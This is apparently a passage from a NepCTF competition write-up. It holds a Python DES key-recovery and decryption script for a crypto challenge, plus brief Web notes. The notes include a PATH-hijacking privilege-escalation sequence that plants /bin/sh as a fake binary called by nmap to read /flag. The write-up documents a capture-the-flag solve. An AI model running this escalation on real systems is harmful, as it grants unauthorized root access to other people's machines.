    return [key[x] for x in __pc2]


def get_sub_key(key: List[int]) -> List[List[int]]:
    key = PC_1(key)
    L, R = key[:28], key[28:]

    sub_keys = []

    for i in range(16):
        for j in range(ROTATIONS[i]):
            L.append(L.pop(0))
            R.append(R.pop(0))

        combined = L + R
        sub_key = PC_2(combined)
        sub_keys.append(sub_key)
    # print('LL=', L[:19])
    # print('Rr=', R)
    return sub_keys

def get_sub_key_attack(key: List[int]) -> List[List[int]]:
    L, R = key[:28], key[28:]

    sub_keys = []

    for i in range(16):
        for j in range(ROTATIONS[i]):
            L.append(L.pop(0))
            R.append(R.pop(0))

        combined = L + R
        sub_key = PC_2(combined)
        sub_keys.append(sub_key)
    # print('LL=', L[:19])
    # print('Rr=', R)
    return sub_keys

__ep = [31, 0, 1, 2, 3, 4,
        3, 4, 5, 6, 7, 8,
        7, 8, 9, 10, 11, 12,
        11, 12, 13, 14, 15, 16,
        15, 16, 17, 18, 19, 20,
        19, 20, 21, 22, 23, 24,
        23, 24, 25, 26, 27, 28,
        27, 28, 29, 30, 31, 0
        ]

__p = [15, 6, 19, 20, 28, 11, 27, 16,
       0, 14, 22, 25, 4, 17, 30, 9,
       1, 7, 23, 13, 31, 26, 2, 8,
       18, 12, 29, 5, 21, 10, 3, 24
       ]


def EP(data: List[int]) -> List[int]:
    return [data[x] for x in __ep]


def P(data: List[int]) -> List[int]:
    return [data[x] for x in __p]


__s_box = [

    [
        [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7],
        [0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8],
        [4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0],
        [15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
    ],

    [
        [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10],
        [3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5],
        [0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15],
        [13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
    ],

    [
        [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8],
        [13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1],
        [13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7],
        [1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
    ],

    [
        [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15],
        [13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9],
        [10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4],
        [3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
    ],

    [
        [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9],
        [14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6],
        [4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14],
        [11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
    ],

    [
        [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11],
        [10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8],
        [9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6],
        [4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
    ],

    [
        [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1],
        [13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6],
        [1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2],
        [6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
    ],

    [
        [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7],
        [1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2],
        [7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8],
        [2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
    ]
]


def S_box(data: List[int]) -> List[int]:
    output = []
    for i in range(0, 48, 6):
        row = data[i] * 2 + data[i + 5]
        col = reduce(add, [data[i + j] * (2 ** (4 - j)) for j in range(1, 5)])
        output += [int(x) for x in format(__s_box[i // 6][row][col], '04b')]
    return output


def encrypt(plain: List[int], sub_keys: List[List[int]]) -> List[int]:
    plain = IP(plain)
    L, R = plain[:32], plain[32:]

    for i in range(16):
        prev_L = L
        L = R
        expanded_R = EP(R)
        xor_result = [a ^ b for a, b in zip(expanded_R, sub_keys[i])]
        substituted = S_box(xor_result)
        permuted = P(substituted)

        R = [a ^ b for a, b in zip(permuted, prev_L)]

    cipher = R + L
    cipher = [cipher[x] for x in [39, 7, 47, 15, 55, 23, 63, 31,
                                  38, 6, 46, 14, 54, 22, 62, 30,
                                  37, 5, 45, 13, 53, 21, 61, 29,
                                  36, 4, 44, 12, 52, 20, 60, 28,
                                  35, 3, 43, 11, 51, 19, 59, 27,
                                  34, 2, 42, 10, 50, 18, 58, 26,
                                  33, 1, 41, 9, 49, 17, 57, 25,
                                  32, 0, 40, 8, 48, 16, 56, 24]]

    return cipher


def bitxor(plain1: List[int], plain2: List[int]) -> List[int]:
    return [int(i) for i in
            bin(int(''.join(str(i) for i in plain1), 2) ^ int(''.join(str(i) for i in plain2), 2))[2:].zfill(64)]


def add(x, y):
    return x + y

def decrypt(plain: List[int], sub_keys: List[List[int]]) -> List[int]:
    # plain = IP(plain)
    L, R = plain[:32], plain[32:]

    for i in range(16):
        prev_L = L
        L = R
        expanded_R = EP(R)
        xor_result = [a ^ b for a, b in zip(expanded_R, sub_keys[i])]
        substituted = S_box(xor_result)
        permuted = P(substituted)

        R = [a ^ b for a, b in zip(permuted, prev_L)]

    cipher = R + L
    # cipher = [cipher[x] for x in [39, 7, 47, 15, 55, 23, 63, 31,
    #                               38, 6, 46, 14, 54, 22, 62, 30,
    #                               37, 5, 45, 13, 53, 21, 61, 29,
    #                               36, 4, 44, 12, 52, 20, 60, 28,
    #                               35, 3, 43, 11, 51, 19, 59, 27,
    #                               34, 2, 42, 10, 50, 18, 58, 26,
    #                               33, 1, 41, 9, 49, 17, 57, 25,
    #                               32, 0, 40, 8, 48, 16, 56, 24]]

    return cipher

P0 = [39, 7, 47, 15, 55, 23, 63, 31,
                                  38, 6, 46, 14, 54, 22, 62, 30,
                                  37, 5, 45, 13, 53, 21, 61, 29,
                                  36, 4, 44, 12, 52, 20, 60, 28,
                                  35, 3, 43, 11, 51, 19, 59, 27,
                                  34, 2, 42, 10, 50, 18, 58, 26,
                                  33, 1, 41, 9, 49, 17, 57, 25,
                                  32, 0, 40, 8, 48, 16, 56, 24]
P0_inv = [0] * len(P0)
for i, b in enumerate(P0):
    P0_inv[b] = i

_IP_inv = [0] * len(_IP)
for i, b in enumerate(_IP):
    _IP_inv[b] = i

def P_set(c, box):
    return [c[_] for _ in box]

def bin2str(x: []):
    res = bytearray()
    for i in range(0, len(x), 8):
        res.append(int("".join(map(str, x[i:i+8])), 2))
    return res

# 爆破过程
# check = []
# for test in range(2 ** 9):
# # for test in range(1):
#     LL= [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
#     RR= [0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0]
#     LL += list(map(int, bin(test)[2:].ljust(9, "0")))
#     sub_keys = []
#
#     t=[0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0]
#     for i in range(16):
#         combined = LL + RR
#         sub_key = PC_2(combined)
#         sub_keys.append(sub_key)
#         for j in range(ROTATIONS[::-1][i]):
#             LL.insert(0, LL.pop(-1))
#             RR.insert(0, RR.pop(-1))
#     # print(LL)
#     # print(RR)
#     # sub_keys = sub_keys[::-1]
#     # print(sub_keys)
#     ct = decrypt(P_set(t[:64], P0_inv), sub_keys)
#     print(test, bin2str(P_set(ct, _IP_inv)))
#     x = bin2str(P_set(ct, _IP_inv))
#     check.append((len(repr(x)), x, test))
# check.sort()
# print(check)
# (22, bytearray(b'NepCTF{N'), 503)

LL= [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
RR= [0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0]
LL += list(map(int, bin(503)[2:].ljust(9, "0")))
sub_keys = []

flag = b""
t=[0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0]
for i in range(16):
    combined = LL + RR
    sub_key = PC_2(combined)
    sub_keys.append(sub_key)
    for j in range(ROTATIONS[::-1][i]):
        LL.insert(0, LL.pop(-1))
        RR.insert(0, RR.pop(-1))
ct = decrypt(P_set(t[:64], P0_inv), sub_keys)
raw = P_set(ct, _IP_inv)
x = bin2str(raw)
print(x)
flag += x

z = raw
keys_t = LL + RR
key = [0] * 64
for i, b in enumerate(__pc1):
    key[b] = keys_t[i]
print(key)
print(bin2str(key))
ct = decrypt(P_set(t[64:64*2], P0_inv), get_sub_key(bitxor(z, key))[::-1])
raw = P_set(ct, _IP_inv)
x = bin2str(raw)
print(x)
flag += x


z = raw
ct = decrypt(P_set(t[64*2:64*3], P0_inv), get_sub_key(bitxor(z, key))[::-1])
raw = P_set(ct, _IP_inv)
x = bin2str(raw)
print(x)
flag += x

print(flag)

Web

ez_java_checkin

简单的java反序列化漏洞，一把梭

独步天下-转生成为镜花水月中的王者

渗透签到，提示环境变量提权，一把梭

echo "/bin/sh"> /tmp/ports-alive
chmod 777 /tmp/ports-alive
export PATH=/tmp:$PATH
nmap -v
cat /flag

本文采用CC-BY-SA-4.0协议，转载请注明出处
作者: Csome